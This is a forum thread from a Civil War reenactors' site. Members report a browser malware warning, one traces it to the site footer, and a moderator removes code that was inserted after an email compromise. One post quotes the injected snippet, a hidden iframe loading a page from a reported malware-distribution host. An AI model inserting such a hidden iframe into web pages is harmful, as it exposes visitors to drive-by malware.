+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 10 of 11

Thread: Warning!! This Forum Site has Malaware

  1. #1
    Join Date
    Feb 2006
    Posts
    1,134

    Default Warning!! This Forum Site has Malaware

    Guys, you may want to check to see if some malaware creep has added some code to your site somewhere. I am getting a malaware warning that says...

    "www.cwreenactors.com contains content from mavmor.in, a site known to distribute malware. Your computer might catch a virus if you visit this site."

    WTH
    Yuma gonna luv it

  2. #2

    Default

    I'm not getting a warning with AVG, but now that you mention it, it's coming from the footer. A tracking code maybe?

    <iframewidth='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe>

    Hank Trent
    hanktrent@gmail.com

  3. #3
    Join Date
    Feb 2006
    Location
    Va.
    Posts
    683

    Default

    I have got a notice that synamtec is blocking something lately. I will pay attention what I am looking at the next time I get it. It only gives an ip address.
    Jim Mayo
    Member of the old vets mess.

    http://www.angelfire.com/ma4/j_mayo/index.html

  4. #4
    Join Date
    Jun 2009
    Location
    Raleigh NC
    Posts
    226

    Default

    I am getting a notification of a threat too and I proceeded anyway and now the left corner of my screen looks weird!

  5. #5
    Join Date
    Jul 2006
    Posts
    3,173

    Default

    I got it yesterday, but AVG blocked it. I ran a scan immediately afterwards and it didn't turn up anything. Today I had no problem loggin on.
    Rob Weaver
    Pine River Boys, Co I, 7th Wisconsin
    "We're... Christians, what read the Bible and foller what it says about lovin' your enemies and carin' for them what despitefully use you -- that is, after you've downed 'em good and hard."
    -Si Klegg and His Pard Shorty

  6. #6
    Join Date
    Feb 2006
    Location
    Tuskaloosa, Alabama
    Posts
    3,916

    Default

    We've called the Big Bugs
    Mrs. Lawson
    Weaver, Spinster, Strong Fast Dyes
    Knitted Goods and yarns available thlawson@bellsouth.net



    Moderator, When I remember. We got Rules here!



    http://www.bluegraygettysburg.com/

  7. #7

    Default

    Yes, some sort of malware has made its presence known. My AVG caught it as well. We will look in to it and will try to get this solved as quickly as possible. Thanks.
    DeputyClerk
    Moderator
    Click here to see Forum Guidelines

  8. #8
    Join Date
    Feb 2006
    Posts
    147

    Default

    Working on this. May shut the forum down till I have it resolved.

  9. #9
    Join Date
    Feb 2006
    Posts
    147

    Default

    I removed it. My email was hacked and I had spam going out yesterday. They also used the password to insert the code into vBulletin. All fires are out for now but I have no idea what else could have been messed with. Ive changed all my passwords.

  10. #10
    Join Date
    May 2008
    Location
    Lutz, FL
    Posts
    356

    Default

    yeah my Mac didn't wanna look back. Thanks for the heads up.
    Nast "T"
    Michael Farnsley
    aka Thomas Nast
    www.bohemianbrigade.com

    "Whose toils cheered the fireside educated provinces of rustics unto a bright nation of readers and gave incentive to narrate distant wars and explore dark lands"

+ Reply to Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts